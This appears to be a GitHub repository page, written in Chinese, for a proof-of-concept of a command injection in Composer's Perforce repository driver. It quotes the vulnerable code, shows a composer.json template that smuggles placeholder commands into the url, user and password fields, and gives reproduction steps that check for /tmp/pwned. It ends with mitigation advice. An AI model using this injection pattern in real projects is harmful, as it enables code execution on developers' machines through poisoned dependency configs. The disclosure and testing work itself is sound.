daptheHuman/cve-2026-40176-cve-2026-40261

GitHub: daptheHuman/cve-2026-40176-cve-2026-40261

该工具提供了一个 CVE-2026-40176 / CVE-2026-40261 的概念验证项目，帮助理解与复现 Composer Perforce 仓库的命令注入漏洞。

Stars: 0 | Forks: 0

# CVE-2026-40176 ## Composer Perforce 仓库远程代码执行（RCE） [![Composer 版本](https://img.shields.io/badge/composer-%3C2.2.27-red.svg)](https://getcomposer.org/) [![严重性](https://img.shields.io/badge/severity-CRITICAL-red.svg)](https://nvd.nist.gov/) [![类型](https://img.shields.io/badge/type-RCE-red.svg)](https://owasp.org/www-community/attacks/Command_Injection) ## 📋 摘要 Composer 的 Perforce 仓库驱动程序中存在命令注入漏洞，由于仓库 URL 处理过程中输入验证不足，导致远程代码执行（RCE）。 ## 🎯 漏洞详情 | 属性 | 值 | |------|-----| | **CVE ID** | CVE-2026-40176 | | **受影响版本** | Composer < 2.2.27 | | **漏洞类型** | 命令注入 | | **攻击向量** | 恶意仓库配置 | | **影响** | 任意代码执行 | | **CVSS 评分** | 高/严重 | ## 🔍 技术描述该漏洞存在于 Composer 处理 `type` 为 `perforce` 的方式中。参数在传递给 shell 命令前未经过适当清理，允许攻击者注入任意系统命令。 ``` public function generateP4Command($command, $useClient = true) { $p4Command = 'p4 '; $p4Command .= '-u ' . $this->getUser() . ' '; if ($useClient) $p4Command .= '-c ' . $this->getClient() . ' '; } $p4Command .= '-p ' . $this->getPort() . ' ' . $command; return $p4Command; } ``` 所有内容均未正确转义，攻击者可通过为所有 `perforce` 类型的字段 crafted 恶意载荷来注入命令。 **易受攻击的代码模式：** ``` { "repositories": [ { "type": "perforce", "url": "PERFORCE_URL; INJECTED_COMMAND #", "depot": "depot", "p4user": "user; INJECRTED_COMMAND #", "p4password": "password; INJECTED_COMMAND #", } ] } ``` ## 🚀 概念验证（PoC）本仓库包含一个演示该漏洞的可运行概念验证。 ### 项目结构 ``` CVE-2026-40176/ ├── composer.json # Malicious Perforce repository config ├── vuln-composer.phar # Composer 2.2.26 (VULNERABLE) ├── patched-composer.phar # Composer 2.2.27 (PATCHED) └── README.md # This file ``` ### 复现步骤 #### 1. 克隆仓库 ``` git clone cd CVE-2026-40176 ``` #### 2. 验证 Composer 版本 ``` php vuln-composer.phar --version # 输出：Composer 版本 2.2.26 php patched-composer.phar --version # 输出：Composer 版本 2.2.27 ``` #### 3. 测试易受攻击的版本 ``` php vuln-composer.phar install # 或 php vuln-composer.phar update ``` #### 4. 验证利用 ``` ls -la /tmp/pwned ``` #### 5. 测试已修复版本（应失败） ``` rm -f /tmp/pwned php patched-composer.phar update ls -la /tmp/pwned # 文件不应存在（漏洞已修复） ``` ## 🛡️ 缓解措施 ### 即时操作 1. **升级 Composer** 至 2.2.27 或更高版本： composer self-update --2.2.27 # 或 wget https://getcomposer.org/download/2.2.27/composer.phar 2. **检查所有 composer.json 文件**，查找未知或可疑的仓库配置 3. **审计供应链** — 检查是否有依赖项引用了不受信任的仓库 ### 检测 ``` # 检查您的 Composer 版本 composer --version # 在项目中搜索 Perforce 仓库 grep -r "perforce" */composer.json ```

标签：API密钥检测, Composer, Composer漏洞, CVE, CVE-2026-40176, OpenVAS, Perforce, Perforce漏洞, PHP, RCE, RuleLab, 代码安全, 命令执行, 命令注入, 安全漏洞, 恶意配置, 攻击向量, 数字签名, 漏洞披露, 漏洞枚举, 编程工具, 软件漏洞, 输入验证, 远程代码执行